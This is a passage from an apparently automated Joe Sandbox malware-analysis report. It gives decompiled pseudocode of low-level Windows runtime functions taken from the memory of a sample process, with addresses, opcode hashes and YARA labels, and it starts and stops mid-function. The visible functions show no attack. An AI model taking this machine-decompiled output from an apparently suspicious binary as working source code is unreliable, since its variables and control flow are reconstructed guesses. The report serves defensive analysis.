				intOrPtr* _t82;
				intOrPtr _t83;
				signed short* _t84;
				intOrPtr _t85;
				signed int _t87;
				intOrPtr* _t90;
				intOrPtr* _t93;
				intOrPtr* _t94;
				void* _t98;

				_t84 = __edx;
				_t80 = __ecx;
				_push(__ecx);
				_push(__ecx);
				_t55 = __ecx;
				_v8 = __edx;
				_t87 =  *__edx & 0x0000ffff;
				_v12 = __ecx;
				_t3 = _t55 + 0x154; // 0x154
				_t93 = _t3;
				_t78 =  *_t93;
				_t4 = _t87 + 2; // 0x2
				_t56 = _t4;
				while(_t78 != _t93) {
					if( *((intOrPtr*)(_t78 + 0x14)) != _t56) {
						L4:
						_t78 =  *_t78;
						continue;
					} else {
						_t7 = _t78 + 0x18; // 0x18
						if(E00A7D4F0(_t7, _t84[2], _t87) == _t87) {
							_t40 = _t78 + 0xc; // 0xc
							_t94 = _t40;
							_t90 =  *_t94;
							while(_t90 != _t94) {
								_t41 = _t90 + 8; // 0x8
								_t74 = E00A6F380(_a4, _t41, 0x10);
								_t98 = _t98 + 0xc;
								if(_t74 != 0) {
									_t90 =  *_t90;
									continue;
								}
								goto L12;
							}
							_t82 = L00A44620(_t80,  *((intOrPtr*)( *[fs:0x30] + 0x18)), 8, 0x18);
							if(_t82 != 0) {
								_t46 = _t78 + 0xc; // 0xc
								_t69 = _t46;
								asm("movsd");
								asm("movsd");
								asm("movsd");
								asm("movsd");
								_t85 =  *_t69;
								if( *((intOrPtr*)(_t85 + 4)) != _t69) {
									L20:
									_t82 = 3;
									asm("int 0x29");
								}
								 *((intOrPtr*)(_t82 + 4)) = _t69;
								 *_t82 = _t85;
								 *((intOrPtr*)(_t85 + 4)) = _t82;
								 *_t69 = _t82;
								 *(_t78 + 8) =  *(_t78 + 8) + 1;
								 *(_v12 + 0xdc) =  *(_v12 + 0xdc) | 0x00000010;
								goto L11;
							} else {
								L18:
								_push(0xe);
								_pop(0);
							}
						} else {
							_t84 = _v8;
							_t9 = _t87 + 2; // 0x2
							_t56 = _t9;
							goto L4;
						}
					}
					L12:
					return 0;
				}
				_t10 = _t87 + 0x1a; // 0x1a
				_t78 = L00A44620(_t80,  *((intOrPtr*)( *[fs:0x30] + 0x18)), 8, _t10);
				if(_t78 == 0) {
					goto L18;
				} else {
					_t12 = _t87 + 2; // 0x2
					 *((intOrPtr*)(_t78 + 0x14)) = _t12;
					_t16 = _t78 + 0x18; // 0x18
					E00A6F3E0(_t16, _v8[2], _t87);
					 *((short*)(_t78 + _t87 + 0x18)) = 0;
					_t19 = _t78 + 0xc; // 0xc
					_t66 = _t19;
					 *((intOrPtr*)(_t66 + 4)) = _t66;
					 *_t66 = _t66;
					 *(_t78 + 8) =  *(_t78 + 8) & 0x00000000;
					_t81 = L00A44620(_t80,  *((intOrPtr*)( *[fs:0x30] + 0x18)), 8, 0x18);
					if(_t81 == 0) {
						goto L18;
					} else {
						_t26 = _t78 + 0xc; // 0xc
						_t69 = _t26;
						asm("movsd");
						asm("movsd");
						asm("movsd");
						asm("movsd");
						_t85 =  *_t69;
						if( *((intOrPtr*)(_t85 + 4)) != _t69) {
							goto L20;
						} else {
							 *((intOrPtr*)(_t81 + 4)) = _t69;
							 *_t81 = _t85;
							 *((intOrPtr*)(_t85 + 4)) = _t81;
							 *_t69 = _t81;
							_t83 = _v12;
							 *(_t78 + 8) = 1;
							 *(_t83 + 0xdc) =  *(_t83 + 0xdc) | 0x00000010;
							_t34 = _t83 + 0x154; // 0x1ba
							_t69 = _t34;
							_t85 =  *_t69;
							if( *((intOrPtr*)(_t85 + 4)) != _t69) {
								goto L20;
							} else {
								 *_t78 = _t85;
								 *((intOrPtr*)(_t78 + 4)) = _t69;
								 *((intOrPtr*)(_t85 + 4)) = _t78;
								 *_t69 = _t78;
								 *(_t83 + 0xdc) =  *(_t83 + 0xdc) | 0x00000010;
							}
						}
						goto L11;
					}
				}
				goto L12;
			}





















                                                              0x00af740d
                                                              0x00af740d
                                                              0x00af7412
                                                              0x00af7413
                                                              0x00af7416
                                                              0x00af7418
                                                              0x00af741c
                                                              0x00af741f
                                                              0x00af7422
                                                              0x00af7422
                                                              0x00af7428
                                                              0x00af742a
                                                              0x00af742a
                                                              0x00af7451
                                                              0x00af7432
                                                              0x00af744f
                                                              0x00af744f
                                                              0x00000000
                                                              0x00af7434
                                                              0x00af7438
                                                              0x00af7443
                                                              0x00af7517
                                                              0x00af7517
                                                              0x00af751a
                                                              0x00af7535
                                                              0x00af7520
                                                              0x00af7527
                                                              0x00af752c
                                                              0x00af7531
                                                              0x00af7533
                                                              0x00000000
                                                              0x00af7533
                                                              0x00000000
                                                              0x00af7531
                                                              0x00af754b
                                                              0x00af754f
                                                              0x00af755c
                                                              0x00af755c
                                                              0x00af755f
                                                              0x00af7560
                                                              0x00af7561
                                                              0x00af7562
                                                              0x00af7563
                                                              0x00af7568
                                                              0x00af756a
                                                              0x00af756c
                                                              0x00af756d
                                                              0x00af756d
                                                              0x00af756f
                                                              0x00af7572
                                                              0x00af7574
                                                              0x00af7577
                                                              0x00af757c
                                                              0x00af757f
                                                              0x00000000
                                                              0x00af7551
                                                              0x00af7551
                                                              0x00af7551
                                                              0x00af7553
                                                              0x00af7553
                                                              0x00af7449
                                                              0x00af7449
                                                              0x00af744c
                                                              0x00af744c
                                                              0x00000000
                                                              0x00af744c
                                                              0x00af7443
                                                              0x00af750e
                                                              0x00af7514
                                                              0x00af7514
                                                              0x00af7455
                                                              0x00af7469
                                                              0x00af746d
                                                              0x00000000
                                                              0x00af7473
                                                              0x00af7473
                                                              0x00af7476
                                                              0x00af7480
                                                              0x00af7484
                                                              0x00af748e
                                                              0x00af7493
                                                              0x00af7493
                                                              0x00af7496
                                                              0x00af7499
                                                              0x00af74a1
                                                              0x00af74b1
                                                              0x00af74b5
                                                              0x00000000
                                                              0x00af74bb
                                                              0x00af74c1
                                                              0x00af74c1
                                                              0x00af74c4
                                                              0x00af74c5
                                                              0x00af74c6
                                                              0x00af74c7
                                                              0x00af74c8
                                                              0x00af74cd
                                                              0x00000000
                                                              0x00af74d3
                                                              0x00af74d3
                                                              0x00af74d6
                                                              0x00af74d8
                                                              0x00af74db
                                                              0x00af74dd
                                                              0x00af74e0
                                                              0x00af74e7
                                                              0x00af74ee
                                                              0x00af74ee
                                                              0x00af74f4
                                                              0x00af74f9
                                                              0x00000000
                                                              0x00af74fb
                                                              0x00af74fb
                                                              0x00af74fd
                                                              0x00af7500
                                                              0x00af7503
                                                              0x00af7505
                                                              0x00af7505
                                                              0x00af74f9
                                                              0x00000000
                                                              0x00af74cd
                                                              0x00af74b5
                                                              0x00000000

                                                              Memory Dump Source
                                                              • Source File: 00000003.00000002.357525357.0000000000A00000.00000040.00001000.00020000.00000000.sdmp, Offset: 00A00000, based on PE: true
                                                              Joe Sandbox IDA Plugin
                                                              • Snapshot File: hcaresult_3_2_a00000_eixfhzlwqd.jbxd
                                                              Similarity
                                                              • API ID:
                                                              • String ID:
                                                              • API String ID:
                                                              • Opcode ID: 01a4d08349e29d22493120a27b3d49beb444160764ac4f0ac8d9a4757e3060ec
                                                              • Instruction ID: 2fd63f1308cddc5eed05d7843a46a448f0e0888babd68c99919c6fb0f9f4919a
                                                              • Opcode Fuzzy Hash: 01a4d08349e29d22493120a27b3d49beb444160764ac4f0ac8d9a4757e3060ec
                                                              • Instruction Fuzzy Hash: 86519E7160060AEFCB15CF54D981A6AFBB5FF45304F15C0BAEA089F252E771E946CB90
                                                              Uniqueness

                                                              Uniqueness Score: -1.00%

                                                              Function 00A52990 Relevance: .1, Instructions: 133COMMON
                                                              Download Yara Rule
                                                              C-Code - Quality: 97%
                                                              			E00A52990() {
				signed int* _t62;
				signed int _t64;
				intOrPtr _t66;
				signed short* _t69;
				intOrPtr _t76;
				signed short* _t79;
				void* _t81;
				signed int _t82;
				signed short* _t83;
				signed int _t87;
				intOrPtr _t91;
				void* _t98;
				signed int _t99;
				void* _t101;
				signed int* _t102;
				void* _t103;
				void* _t104;
				void* _t107;

				_push(0x20);
				_push(0xafff00);
				E00A7D08C(_t81, _t98, _t101);
				 *((intOrPtr*)(_t103 - 0x28)) =  *[fs:0x18];
				_t99 = 0;
				 *((intOrPtr*)( *((intOrPtr*)(_t103 + 0x1c)))) = 0;
				_t82 =  *((intOrPtr*)(_t103 + 0x10));
				if(_t82 == 0) {
					_t62 = 0xc0000100;
				} else {
					 *((intOrPtr*)(_t103 - 4)) = 0;
					_t102 = 0xc0000100;
					 *((intOrPtr*)(_t103 - 0x30)) = 0xc0000100;
					_t64 = 4;
					while(1) {
						 *(_t103 - 0x24) = _t64;
						if(_t64 == 0) {
							break;
						}
						_t87 = _t64 * 0xc;
						 *(_t103 - 0x2c) = _t87;
						_t107 = _t82 -  *((intOrPtr*)(_t87 + 0xa01664));
						if(_t107 <= 0) {
							if(_t107 == 0) {
								_t79 = E00A6E5C0( *((intOrPtr*)(_t103 + 0xc)),  *((intOrPtr*)(_t87 + 0xa01668)), _t82);
								_t104 = _t104 + 0xc;
								__eflags = _t79;
								if(__eflags == 0) {
									_t102 = E00AA51BE(_t82,  *((intOrPtr*)( *(_t103 - 0x2c) + 0xa0166c)),  *((intOrPtr*)(_t103 + 0x14)), _t99, _t102, __eflags,  *((intOrPtr*)(_t103 + 0x18)),  *((intOrPtr*)(_t103 + 0x1c)));
									 *((intOrPtr*)(_t103 - 0x30)) = _t102;
									break;
								} else {
									_t64 =  *(_t103 - 0x24);
									goto L5;
								}
								goto L13;
							} else {
								L5:
								_t64 = _t64 - 1;
								continue;
							}
						}
						break;
					}
					 *((intOrPtr*)(_t103 - 0x1c)) = _t102;
					__eflags = _t102;
					if(_t102 < 0) {
						__eflags = _t102 - 0xc0000100;
						if(_t102 == 0xc0000100) {
							_t83 =  *((intOrPtr*)(_t103 + 8));
							__eflags = _t83;
							if(_t83 != 0) {
								 *((intOrPtr*)(_t103 - 0x20)) = _t83;
								__eflags =  *_t83 - _t99;
								if( *_t83 == _t99) {
									_t102 = 0xc0000100;
									goto L19;
								} else {
									_t91 =  *((intOrPtr*)( *((intOrPtr*)(_t103 - 0x28)) + 0x30));
									_t66 =  *((intOrPtr*)(_t91 + 0x10));
									__eflags =  *((intOrPtr*)(_t66 + 0x48)) - _t83;
									if( *((intOrPtr*)(_t66 + 0x48)) == _t83) {
										__eflags =  *((intOrPtr*)(_t91 + 0x1c));
										if( *((intOrPtr*)(_t91 + 0x1c)) == 0) {
											L26:
											_t102 = E00A52AE4(_t103 - 0x20,  *((intOrPtr*)(_t103 + 0xc)), _t82,  *((intOrPtr*)(_t103 + 0x14)),  *((intOrPtr*)(_t103 + 0x18)),  *((intOrPtr*)(_t103 + 0x1c)));
											 *((intOrPtr*)(_t103 - 0x1c)) = _t102;
											__eflags = _t102 - 0xc0000100;
											if(_t102 != 0xc0000100) {
												goto L12;
											} else {
												_t99 = 1;
												_t83 =  *((intOrPtr*)(_t103 - 0x20));
												goto L18;
											}
										} else {
											_t69 = E00A36600( *((intOrPtr*)(_t91 + 0x1c)));
											__eflags = _t69;
											if(_t69 != 0) {
												goto L26;
											} else {
												_t83 =  *((intOrPtr*)(_t103 + 8));
												goto L18;
											}
										}
									} else {
										L18:
										_t102 = E00A52C50(_t83,  *((intOrPtr*)(_t103 + 0xc)), _t82,  *((intOrPtr*)(_t103 + 0x14)),  *((intOrPtr*)(_t103 + 0x18)),  *((intOrPtr*)(_t103 + 0x1c)), _t99);
										L19:
										 *((intOrPtr*)(_t103 - 0x1c)) = _t102;
										goto L12;
									}
								}
								L28:
							} else {
								E00A3EEF0( *((intOrPtr*)( *[fs:0x30] + 0x1c)));
								 *((intOrPtr*)(_t103 - 4)) = 1;
								 *((intOrPtr*)(_t103 - 0x20)) =  *((intOrPtr*)( *((intOrPtr*)( *((intOrPtr*)( *((intOrPtr*)(_t103 - 0x28)) + 0x30)) + 0x10)) + 0x48));
								_t102 =  *((intOrPtr*)(_t103 + 0x1c));
								_t76 = E00A52AE4(_t103 - 0x20,  *((intOrPtr*)(_t103 + 0xc)), _t82,  *((intOrPtr*)(_t103 + 0x14)),  *((intOrPtr*)(_t103 + 0x18)), _t102);
								 *((intOrPtr*)(_t103 - 0x1c)) = _t76;
								__eflags = _t76 - 0xc0000100;
								if(_t76 == 0xc0000100) {
									 *((intOrPtr*)(_t103 - 0x1c)) = E00A52C50( *((intOrPtr*)(_t103 - 0x20)),  *((intOrPtr*)(_t103 + 0xc)), _t82,  *((intOrPtr*)(_t103 + 0x14)),  *((intOrPtr*)(_t103 + 0x18)), _t102, 1);
								}
								 *((intOrPtr*)(_t103 - 4)) = _t99;
								E00A52ACB();
							}
						}
					}
					L12:
					 *((intOrPtr*)(_t103 - 4)) = 0xfffffffe;
					_t62 = _t102;
				}
				L13:
				return E00A7D0D1(_t62);
				goto L28;
			}





















                                                              0x00a52990
                                                              0x00a52992
                                                              0x00a52997
                                                              0x00a529a3
                                                              0x00a529a6
                                                              0x00a529ab
                                                              0x00a529ad
                                                              0x00a529b2
                                                              0x00a95c80
                                                              0x00a529b8
                                                              0x00a529b8
                                                              0x00a529bb
                                                              0x00a529c0
                                                              0x00a529c5
                                                              0x00a529c6
                                                              0x00a529c6
                                                              0x00a529cb
                                                              0x00000000
                                                              0x00000000
                                                              0x00a529cd
                                                              0x00a529d0
                                                              0x00a529d9
                                                              0x00a529db
                                                              0x00a529dd
                                                              0x00a52a7f
                                                              0x00a52a84
                                                              0x00a52a87
                                                              0x00a52a89
                                                              0x00a95ca1
                                                              0x00a95ca3
                                                              0x00000000
                                                              0x00a52a8f
                                                              0x00a52a8f
                                                              0x00000000
                                                              0x00a52a8f
                                                              0x00000000
                                                              0x00a529e3
                                                              0x00a529e3
                                                              0x00a529e3
                                                              0x00000000
                                                              0x00a529e3
                                                              0x00a529dd
                                                              0x00000000
                                                              0x00a529db
                                                              0x00a529e6
                                                              0x00a529e9
                                                              0x00a529eb
                                                              0x00a529ed
                                                              0x00a529f3
                                                              0x00a529f5
                                                              0x00a529f8
                                                              0x00a529fa
                                                              0x00a52a97
                                                              0x00a52a9a
                                                              0x00a52a9d
                                                              0x00a52add
                                                              0x00000000
                                                              0x00a52a9f
                                                              0x00a52aa2
                                                              0x00a52aa5
                                                              0x00a52aa8
                                                              0x00a52aab
                                                              0x00a95cab
                                                              0x00a95caf
                                                              0x00a95cc5
                                                              0x00a95cda
                                                              0x00a95cdc
                                                              0x00a95cdf
                                                              0x00a95ce5
                                                              0x00000000
                                                              0x00a95ceb
                                                              0x00a95ced
                                                              0x00a95cee
                                                              0x00000000
                                                              0x00a95cee
                                                              0x00a95cb1
                                                              0x00a95cb4
                                                              0x00a95cb9
                                                              0x00a95cbb
                                                              0x00000000
                                                              0x00a95cbd
                                                              0x00a95cbd
                                                              0x00000000
                                                              0x00a95cbd
                                                              0x00a95cbb
                                                              0x00a52ab1
                                                              0x00a52ab1
                                                              0x00a52ac4
                                                              0x00a52ac6
                                                              0x00a52ac6
                                                              0x00000000
                                                              0x00a52ac6
                                                              0x00a52aab
                                                              0x00000000
                                                              0x00a52a00
                                                              0x00a52a09
                                                              0x00a52a0e
                                                              0x00a52a21
                                                              0x00a52a24
                                                              0x00a52a35
                                                              0x00a52a3a
                                                              0x00a52a3d
                                                              0x00a52a42
                                                              0x00a52a59
                                                              0x00a52a59
                                                              0x00a52a5c
                                                              0x00a52a5f
                                                              0x00a52a5f
                                                              0x00a529fa
                                                              0x00a529f3
                                                              0x00a52a64
                                                              0x00a52a64
                                                              0x00a52a6b
                                                              0x00a52a6b
                                                              0x00a52a6d
                                                              0x00a52a72
                                                              0x00000000

                                                              Memory Dump Source
                                                              • Source File: 00000003.00000002.357525357.0000000000A00000.00000040.00001000.00020000.00000000.sdmp, Offset: 00A00000, based on PE: true
                                                              Joe Sandbox IDA Plugin
                                                              • Snapshot File: hcaresult_3_2_a00000_eixfhzlwqd.jbxd
                                                              Similarity
                                                              • API ID:
                                                              • String ID:
                                                              • API String ID:
                                                              • Opcode ID: 375c7e71c493b6c065df5d07bc9ca95bc1efa9f6dea889e03ec6c88b0cf3364e
                                                              • Instruction ID: 7a41dda06005fc65795d73b958feaa1002815e9912ee98f1f4cc7bf64f157266
                                                              • Opcode Fuzzy Hash: 375c7e71c493b6c065df5d07bc9ca95bc1efa9f6dea889e03ec6c88b0cf3364e
                                                              • Instruction Fuzzy Hash: F9515471A00209EFDF25DFA4C981AEEBBB5BF49350F148015FE05AB261C3319D96DBA0
                                                              Uniqueness

                                                              Uniqueness Score: -1.00%

                                                              Function 00A54D3B Relevance: .1, Instructions: 131COMMON
                                                              Download Yara Rule
                                                              C-Code - Quality: 78%
                                                              			E00A54D3B(intOrPtr __ecx, intOrPtr __edx, intOrPtr _a4) {
				signed int _v12;
				char _v176;
				char _v177;
				char _v184;
				intOrPtr _v192;
				intOrPtr _v196;
				void* __ebx;
				void* __edi;
				void* __esi;
				signed short _t42;
				char* _t44;
				intOrPtr _t46;
				intOrPtr _t50;
				char* _t57;
				intOrPtr _t59;
				intOrPtr _t67;
				signed int _t69;

				_t64 = __edx;
				_v12 =  *0xb1d360 ^ _t69;
				_t65 = 0xa0;
				_v196 = __edx;
				_v177 = 0;
				_t67 = __ecx;
				_v192 = __ecx;
				E00A6FA60( &_v176, 0, 0xa0);
				_t57 =  &_v176;
				_t59 = 0xa0;
				if( *0xb17bc8 != 0) {
					L3:
					while(1) {
						asm("movsd");
						asm("movsd");
						asm("movsd");
						asm("movsd");
						_t67 = _v192;
						 *((intOrPtr*)(_t57 + 0x10)) = _a4;
						 *(_t57 + 0x24) =  *(_t57 + 0x24) & 0x00000000;
						 *(_t57 + 0x14) =  *(_t67 + 0x34) & 0x0000ffff;
						 *((intOrPtr*)(_t57 + 0x20)) = _v196;
						_push( &_v184);
						_push(_t59);
						_push(_t57);
						_push(0xa0);
						_push(_t57);
						_push(0xf);
						_t42 = E00A6B0B0();
						if(_t42 != 0xc0000023) {
							break;
						}
						if(_v177 != 0) {
							L00A477F0( *((intOrPtr*)( *[fs:0x30] + 0x18)), 0, _t57);
						}
						_v177 = 1;
						_t44 = L00A44620(_t59,  *((intOrPtr*)( *[fs:0x30] + 0x18)), 8, _v184);
						_t59 = _v184;
						_t57 = _t44;
						if(_t57 != 0) {
							continue;
						} else {
							_t42 = 0xc0000017;
							break;
						}
					}
					if(_t42 != 0) {
						_t65 = E00A2CCC0(_t42);
						if(_t65 != 0) {
							L10:
							if(_v177 != 0) {
								if(_t57 != 0) {
									L00A477F0( *((intOrPtr*)( *[fs:0x30] + 0x18)), 0, _t57);
								}
							}
							_t46 = _t65;
							L12:
							return E00A6B640(_t46, _t57, _v12 ^ _t69, _t64, _t65, _t67);
						}
						L7:
						_t50 = _a4;
						 *((intOrPtr*)(_t67 + 0x30)) =  *((intOrPtr*)(_t57 + 0x18));
						if(_t50 != 3) {
							if(_t50 == 2) {
								goto L8;
							}
							L9:
							if(E00A6F380(_t67 + 0xc, 0xa05138, 0x10) == 0) {
								 *0xb160d8 = _t67;
							}
							goto L10;
						}
						L8:
						_t64 = _t57 + 0x28;
						E00A54F49(_t67, _t57 + 0x28);
						goto L9;
					}
					_t65 = 0;
					goto L7;
				}
				if(E00A54E70(0xb186b0, 0xa55690, 0, 0) != 0) {
					_t46 = E00A2CCC0(_t56);
					goto L12;
				} else {
					_t59 = 0xa0;
					goto L3;
				}
			}




















                                                              0x00a54d3b
                                                              0x00a54d4d
                                                              0x00a54d53
                                                              0x00a54d58
                                                              0x00a54d65
                                                              0x00a54d6c
                                                              0x00a54d71
                                                              0x00a54d77
                                                              0x00a54d7f
                                                              0x00a54d8c
                                                              0x00a54d8e
                                                              0x00a54dad
                                                              0x00a54db0
                                                              0x00a54db7
                                                              0x00a54db8
                                                              0x00a54db9
                                                              0x00a54dba
                                                              0x00a54dbb
                                                              0x00a54dc1
                                                              0x00a54dc8
                                                              0x00a54dcc
                                                              0x00a54dd5
                                                              0x00a54dde
                                                              0x00a54ddf
                                                              0x00a54de0
                                                              0x00a54de1
                                                              0x00a54de6
                                                              0x00a54de7
                                                              0x00a54de9
                                                              0x00a54df3
                                                              0x00000000
                                                              0x00000000
                                                              0x00a96c7c
                                                              0x00a96c8a
                                                              0x00a96c8a
                                                              0x00a96c9d
                                                              0x00a96ca7
                                                              0x00a96cac
                                                              0x00a96cb2
                                                              0x00a96cb9
                                                              0x00000000
                                                              0x00a96cbf
                                                              0x00a96cbf
                                                              0x00000000
                                                              0x00a96cbf
                                                              0x00a96cb9
                                                              0x00a54dfb
                                                              0x00a96ccf
                                                              0x00a96cd3
                                                              0x00a54e32
                                                              0x00a54e39
                                                              0x00a96ce0
                                                              0x00a96cf2
                                                              0x00a96cf2
                                                              0x00a96ce0
                                                              0x00a54e3f
                                                              0x00a54e41
                                                              0x00a54e51
                                                              0x00a54e51
                                                              0x00a54e03
                                                              0x00a54e03
                                                              0x00a54e09
                                                              0x00a54e0f
                                                              0x00a54e57
                                                              0x00000000
                                                              0x00000000
                                                              0x00a54e1b
                                                              0x00a54e30
                                                              0x00a54e5b
                                                              0x00a54e5b
                                                              0x00000000
                                                              0x00a54e30
                                                              0x00a54e11
                                                              0x00a54e11
                                                              0x00a54e16
                                                              0x00000000
                                                              0x00a54e16
                                                              0x00a54e01
                                                              0x00000000
                                                              0x00a54e01
                                                              0x00a54da5
                                                              0x00a96c6b
                                                              0x00000000
                                                              0x00a54dab
                                                              0x00a54dab
                                                              0x00000000
                                                              0x00a54dab

                                                              Memory Dump Source
                                                              • Source File: 00000003.00000002.357525357.0000000000A00000.00000040.00001000.00020000.00000000.sdmp, Offset: 00A00000, based on PE: true
                                                              Joe Sandbox IDA Plugin
                                                              • Snapshot File: hcaresult_3_2_a00000_eixfhzlwqd.jbxd
                                                              Similarity
                                                              • API ID:
                                                              • String ID:
                                                              • API String ID:
                                                              • Opcode ID: 3ff044bf24c84e08af6ab09c8b2c13155b5d7f94496835f058878180468b3e63
                                                              • Instruction ID: 7843e9561a82130df7c21666b850d754299fe2bceb9e38c336b7df920e90c84c
                                                              • Opcode Fuzzy Hash: 3ff044bf24c84e08af6ab09c8b2c13155b5d7f94496835f058878180468b3e63
                                                              • Instruction Fuzzy Hash: 1941D471A403189FEB21DF14DD82BAAB7B5FB48714F0440A9FD4597281DB74ED88CB91
                                                              Uniqueness

                                                              Uniqueness Score: -1.00%

                                                              Function 00A54BAD Relevance: .1, Instructions: 131COMMON
                                                              Download Yara Rule
                                                              C-Code - Quality: 85%
                                                              			E00A54BAD(intOrPtr __ecx, short __edx, signed char _a4, signed short _a8) {
				signed int _v8;
				short _v20;
				intOrPtr _v24;
				intOrPtr _v28;
				intOrPtr _v32;
				char _v36;
				char _v156;
				short _v158;
				intOrPtr _v160;
				char _v164;
				intOrPtr _v168;
				void* __ebx;
				void* __edi;
				void* __esi;
				signed int _t45;
				intOrPtr _t74;
				signed char _t77;
				intOrPtr _t84;
				char* _t85;
				void* _t86;
				intOrPtr _t87;
				signed short _t88;
				signed int _t89;

				_t83 = __edx;
				_v8 =  *0xb1d360 ^ _t89;
				_t45 = _a8 & 0x0000ffff;
				_v158 = __edx;
				_v168 = __ecx;
				if(_t45 == 0) {
					L22:
					_t86 = 6;
					L12:
					E00A2CC50(_t86);
					L11:
					return E00A6B640(_t86, _t77, _v8 ^ _t89, _t83, _t84, _t86);
				}
				_t77 = _a4;
				if((_t77 & 0x00000001) != 0) {
					goto L22;
				}
				_t8 = _t77 + 0x34; // 0xdce0ba00
				if(_t45 !=  *_t8) {
					goto L22;
				}
				_t9 = _t77 + 0x24; // 0xb18504
				E00A42280(_t9, _t9);
				_t87 = 0x78;
				 *(_t77 + 0x2c) =  *( *[fs:0x18] + 0x24);
				E00A6FA60( &_v156, 0, _t87);
				_t13 = _t77 + 0x30; // 0x3db8
				_t85 =  &_v156;
				_v36 =  *_t13;
				_v28 = _v168;
				_v32 = 0;
				_v24 = 0;
				_v20 = _v158;
				_v160 = 0;
				while(1) {
					_push( &_v164);
					_push(_t87);
					_push(_t85);
					_push(0x18);
					_push( &_v36);
					_push(0x1e);
					_t88 = E00A6B0B0();
					if(_t88 != 0xc0000023) {
						break;
					}
					if(_t85 !=  &_v156) {
						L00A477F0( *((intOrPtr*)( *[fs:0x30] + 0x18)), 0, _t85);
					}
					_t84 = L00A44620(0,  *((intOrPtr*)( *[fs:0x30] + 0x18)), 8, _v164);
					_v168 = _v164;
					if(_t84 == 0) {
						_t88 = 0xc0000017;
						goto L19;
					} else {
						_t74 = _v160 + 1;
						_v160 = _t74;
						if(_t74 >= 0x10) {
							L19:
							_t86 = E00A2CCC0(_t88);
							if(_t86 != 0) {
								L8:
								 *(_t77 + 0x2c) =  *(_t77 + 0x2c) & 0x00000000;
								_t30 = _t77 + 0x24; // 0xb18504
								E00A3FFB0(_t77, _t84, _t30);
								if(_t84 != 0 && _t84 !=  &_v156) {
									L00A477F0( *((intOrPtr*)( *[fs:0x30] + 0x18)), 0, _t84);
								}
								if(_t86 != 0) {
									goto L12;
								} else {
									goto L11;
								}
							}
							L6:
							 *(_t77 + 0x36) =  *(_t77 + 0x36) | 0x00004000;
							if(_v164 != 0) {
								_t83 = _t84;
								E00A54F49(_t77, _t84);
							}
							goto L8;
						}
						_t87 = _v168;
						continue;
					}
				}
				if(_t88 != 0) {
					goto L19;
				}
				goto L6;
			}


























                                                              0x00a54bad
                                                              0x00a54bbf
                                                              0x00a54bc2
                                                              0x00a54bc6
                                                              0x00a54bcd
                                                              0x00a54bd9
                                                              0x00a967fe
                                                              0x00a96800
                                                              0x00a54ccc
                                                              0x00a54ccd
                                                              0x00a54cb7
                                                              0x00a54cc9
                                                              0x00a54cc9
                                                              0x00a54bdf
                                                              0x00a54be5
                                                              0x00000000
                                                              0x00000000
                                                              0x00a54beb
                                                              0x00a54bef
                                                              0x00000000
                                                              0x00000000
                                                              0x00a54bf5
                                                              0x00a54bf9
                                                              0x00a54c06
                                                              0x00a54c0b
                                                              0x00a54c17
                                                              0x00a54c1c
                                                              0x00a54c1f
                                                              0x00a54c25
                                                              0x00a54c33
                                                              0x00a54c3d
                                                              0x00a54c40
                                                              0x00a54c43
                                                              0x00a54c47
                                                              0x00a54c4d
                                                              0x00a54c53
                                                              0x00a54c54
                                                              0x00a54c55
                                                              0x00a54c56
                                                              0x00a54c5b
                                                              0x00a54c5c
                                                              0x00a54c63
                                                              0x00a54c6b
                                                              0x00000000
                                                              0x00000000
                                                              0x00a96776
                                                              0x00a96784
                                                              0x00a96784
                                                              0x00a9679f
                                                              0x00a967a7
                                                              0x00a967af
                                                              0x00a967ce
                                                              0x00000000
                                                              0x00a967b1
                                                              0x00a967b7
                                                              0x00a967b8
                                                              0x00a967c1
                                                              0x00a967d3
                                                              0x00a967d9
                                                              0x00a967dd
                                                              0x00a54c94
                                                              0x00a54c94
                                                              0x00a54c98
                                                              0x00a54c9c
                                                              0x00a54ca3
                                                              0x00a967f4
                                                              0x00a967f4
                                                              0x00a54cb5
                                                              0x00000000
                                                              0x00000000
                                                              0x00000000
                                                              0x00000000
                                                              0x00a54cb5
                                                              0x00a54c79
                                                              0x00a54c7e
                                                              0x00a54c89
                                                              0x00a54c8b
                                                              0x00a54c8f
                                                              0x00a54c8f
                                                              0x00000000
                                                              0x00a54c89
                                                              0x00a967c3
                                                              0x00000000
                                                              0x00a967c3
                                                              0x00a967af
                                                              0x00a54c73
                                                              0x00000000
                                                              0x00000000
                                                              0x00000000

                                                              Memory Dump Source
                                                              • Source File: 00000003.00000002.357525357.0000000000A00000.00000040.00001000.00020000.00000000.sdmp, Offset: 00A00000, based on PE: true
                                                              Joe Sandbox IDA Plugin
                                                              • Snapshot File: hcaresult_3_2_a00000_eixfhzlwqd.jbxd
                                                              Similarity
                                                              • API ID:
                                                              • String ID:
                                                              • API String ID:
                                                              • Opcode ID: ecba46a13edf65ff54682383dc5371ac2a7ee982e142ede76d9a2aff0b03b4dd
                                                              • Instruction ID: 2c29933ca803d16ff390d7f7edcb6d420c1a1885cbd59be230585b4af2c6d5b8
                                                              • Opcode Fuzzy Hash: ecba46a13edf65ff54682383dc5371ac2a7ee982e142ede76d9a2aff0b03b4dd
                                                              • Instruction Fuzzy Hash: 0B419435A012289BCF21DF68C941BEE77F4FF49754F4104A5E908AB241DB74DE84CB95
                                                              Uniqueness

                                                              Uniqueness Score: -1.00%

                                                              Function 00A38A0A Relevance: .1, Instructions: 120COMMON
                                                              Download Yara Rule
                                                              C-Code - Quality: 94%
                                                              			E00A38A0A(intOrPtr* __ecx, signed int __edx) {
				signed int _v8;
				char _v524;
				signed int _v528;
				void* _v532;
				char _v536;
				char _v540;
				char _v544;
				intOrPtr* _v548;
				void* __ebx;
				void* __edi;
				void* __esi;
				signed int _t44;
				void* _t46;
				void* _t48;
				signed int _t53;
				signed int _t55;
				intOrPtr* _t62;
				void* _t63;
				unsigned int _t75;
				signed int _t79;
				unsigned int _t81;
				unsigned int _t83;
				signed int _t84;
				void* _t87;

				_t76 = __edx;
				_v8 =  *0xb1d360 ^ _t84;
				_v536 = 0x200;
				_t79 = 0;
				_v548 = __edx;
				_v544 = 0;
				_t62 = __ecx;
				_v540 = 0;
				_v532 =  &_v524;
				if(__edx == 0 || __ecx == 0) {
					L6:
					return E00A6B640(_t79, _t62, _v8 ^ _t84, _t76, _t79, _t81);
				} else {
					_v528 = 0;
					E00A3E9C0(1, __ecx, 0, 0,  &_v528);
					_t44 = _v528;
					_t81 =  *(_t44 + 0x48) & 0x0000ffff;
					_v528 =  *(_t44 + 0x4a) & 0x0000ffff;
					_t46 = 0xa;
					_t87 = _t81 - _t46;
					if(_t87 > 0 || _t87 == 0) {
						 *_v548 = 0xa01180;
						L5:
						_t79 = 1;
